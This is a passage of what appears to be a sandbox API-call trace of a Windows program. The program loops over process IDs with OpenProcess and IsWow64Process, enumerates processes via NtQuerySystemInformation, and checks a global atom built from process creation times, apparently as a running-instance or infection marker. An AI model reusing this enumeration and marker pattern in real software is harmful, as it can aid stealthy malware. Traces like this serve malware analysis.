	[0095.915] CloseHandle (hObject=0x248) returned 1
	[0095.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0095.915] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.915] CloseHandle (hObject=0x248) returned 1
	[0095.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0095.915] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.915] CloseHandle (hObject=0x248) returned 1
	[0095.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
	[0095.915] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.915] CloseHandle (hObject=0x248) returned 1
	[0095.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0095.916] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.916] CloseHandle (hObject=0x248) returned 1
	[0095.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
	[0095.916] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.916] CloseHandle (hObject=0x248) returned 1
	[0095.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0095.916] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.916] CloseHandle (hObject=0x248) returned 1
	[0095.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0095.916] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.916] CloseHandle (hObject=0x248) returned 1
	[0095.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0095.916] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.916] CloseHandle (hObject=0x248) returned 1
	[0095.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0095.922] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.922] CloseHandle (hObject=0x248) returned 1
	[0095.923] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0095.923] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.923] CloseHandle (hObject=0x248) returned 1
	[0095.923] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0095.923] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.923] CloseHandle (hObject=0x248) returned 1
	[0095.923] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0095.923] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.923] CloseHandle (hObject=0x248) returned 1
	[0095.923] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0095.923] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.923] CloseHandle (hObject=0x248) returned 1
	[0095.923] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
	[0095.923] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.923] CloseHandle (hObject=0x248) returned 1
	[0095.924] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0095.924] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.924] CloseHandle (hObject=0x248) returned 1
	[0095.924] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0095.924] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.924] CloseHandle (hObject=0x248) returned 1
	[0095.924] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
	[0095.924] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.924] CloseHandle (hObject=0x248) returned 1
	[0095.924] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0095.924] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.924] CloseHandle (hObject=0x248) returned 1
	[0095.924] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0095.924] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.924] CloseHandle (hObject=0x248) returned 1
	[0095.925] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0095.925] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.925] CloseHandle (hObject=0x248) returned 1
	[0095.925] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0095.925] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.925] CloseHandle (hObject=0x248) returned 1
	[0095.925] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0095.925] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.925] CloseHandle (hObject=0x248) returned 1
	[0095.925] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0095.926] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0095.926] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0095.926] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0095.926] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0095.926] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0095.926] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0095.926] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0095.927] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0095.927] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0095.927] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0095.927] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0095.927] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0095.927] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0095.927] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.927] CloseHandle (hObject=0x248) returned 1
	[0095.927] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
	[0095.927] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.927] CloseHandle (hObject=0x248) returned 1
	[0096.018] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0096.018] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0096.019] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0096.019] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0096.019] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0096.019] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0096.020] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0096.020] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0096.020] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0096.020] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0096.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0096.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0096.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0096.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0096.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0096.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0096.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0096.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0096.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0096.030] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.030] CloseHandle (hObject=0x248) returned 1
	[0096.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0096.031] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0096.031] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0096.031] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.031] CloseHandle (hObject=0x248) returned 1
	[0096.031] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0096.032] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
	[0096.032] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.032] CloseHandle (hObject=0x248) returned 1
	[0096.032] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0096.032] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.032] CloseHandle (hObject=0x248) returned 1
	[0096.032] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0096.032] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.032] CloseHandle (hObject=0x248) returned 1
	[0096.032] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0096.032] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.033] CloseHandle (hObject=0x248) returned 1
	[0096.033] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0096.033] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.033] CloseHandle (hObject=0x248) returned 1
	[0096.033] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0096.033] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.033] CloseHandle (hObject=0x248) returned 1
	[0096.033] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0096.034] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
	[0096.034] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.034] CloseHandle (hObject=0x248) returned 1
	[0096.034] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0096.034] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.034] CloseHandle (hObject=0x248) returned 1
	[0096.034] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0096.034] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.034] CloseHandle (hObject=0x248) returned 1
	[0096.035] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
	[0096.035] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.035] CloseHandle (hObject=0x248) returned 1
	[0096.035] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0096.035] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.035] CloseHandle (hObject=0x248) returned 1
	[0096.035] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
	[0096.035] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.035] CloseHandle (hObject=0x248) returned 1
	[0096.035] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0096.035] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.035] CloseHandle (hObject=0x248) returned 1
	[0096.036] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0096.036] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.036] CloseHandle (hObject=0x248) returned 1
	[0096.036] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0096.036] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.036] CloseHandle (hObject=0x248) returned 1
	[0096.036] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0096.036] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.036] CloseHandle (hObject=0x248) returned 1
	[0096.037] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0096.037] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.037] CloseHandle (hObject=0x248) returned 1
	[0096.037] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0096.037] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.037] CloseHandle (hObject=0x248) returned 1
	[0096.037] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0096.037] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.037] CloseHandle (hObject=0x248) returned 1
	[0096.038] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0096.038] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.038] CloseHandle (hObject=0x248) returned 1
	[0096.038] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
	[0096.038] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.038] CloseHandle (hObject=0x248) returned 1
	[0096.038] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0096.038] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.038] CloseHandle (hObject=0x248) returned 1
	[0096.039] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0096.039] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.039] CloseHandle (hObject=0x248) returned 1
	[0096.039] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
	[0096.039] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.039] CloseHandle (hObject=0x248) returned 1
	[0096.039] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0096.039] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.039] CloseHandle (hObject=0x248) returned 1
	[0096.040] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0096.040] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.040] CloseHandle (hObject=0x248) returned 1
	[0096.040] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0096.040] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.040] CloseHandle (hObject=0x248) returned 1
	[0096.040] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0096.040] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.040] CloseHandle (hObject=0x248) returned 1
	[0096.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0096.041] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.041] CloseHandle (hObject=0x248) returned 1
	[0096.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0096.041] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0096.041] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0096.042] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0096.042] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0096.042] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0096.042] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0096.042] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0096.043] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0096.043] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0096.043] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0096.043] CloseHandle (hObject=0x248) returned 1
	[0096.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0096.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0096.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0096.044] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.044] CloseHandle (hObject=0x248) returned 1
	[0096.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
	[0096.044] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.044] CloseHandle (hObject=0x248) returned 1
	[0096.044] VirtualFree (lpAddress=0x610000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0096.045] Sleep (dwMilliseconds=0x1e) 
	[0096.119] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16548) returned 0xc0000004
	[0096.120] VirtualAlloc (lpAddress=0x0, dwSize=0x16648, flAllocationType=0x3000, flProtect=0x4) returned 0x610000
	[0096.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x610000, Length=0x16648, ResultLength=0x0 | out: SystemInformation=0x610000, ResultLength=0x0) returned 0x0
	[0096.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0096.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0096.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0096.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0096.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0096.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0096.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0096.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0096.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0096.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0096.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0096.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0096.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0096.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0096.124] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0096.124] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0096.124] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0096.124] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0096.124] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0096.124] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.124] CloseHandle (hObject=0x248) returned 1
	[0096.124] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0096.124] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0096.125] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0096.125] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.125] CloseHandle (hObject=0x248) returned 1
	[0096.125] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0096.125] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
	[0096.125] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.125] CloseHandle (hObject=0x248) returned 1
	[0096.125] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0096.125] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.125] CloseHandle (hObject=0x248) returned 1
	[0096.125] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0096.125] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.125] CloseHandle (hObject=0x248) returned 1
	[0096.126] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0096.126] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.126] CloseHandle (hObject=0x248) returned 1
	[0096.126] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0096.126] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.126] CloseHandle (hObject=0x248) returned 1
	[0096.126] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0096.126] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.126] CloseHandle (hObject=0x248) returned 1
	[0096.126] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0096.126] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
	[0096.126] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.126] CloseHandle (hObject=0x248) returned 1
	[0096.126] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0096.127] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.127] CloseHandle (hObject=0x248) returned 1
	[0096.127] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0096.127] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.127] CloseHandle (hObject=0x248) returned 1
	[0096.127] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
	[0096.127] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.127] CloseHandle (hObject=0x248) returned 1
	[0096.127] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0096.127] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.127] CloseHandle (hObject=0x248) returned 1
	[0096.127] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
	[0096.127] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.127] CloseHandle (hObject=0x248) returned 1
	[0096.128] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0096.128] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.128] CloseHandle (hObject=0x248) returned 1
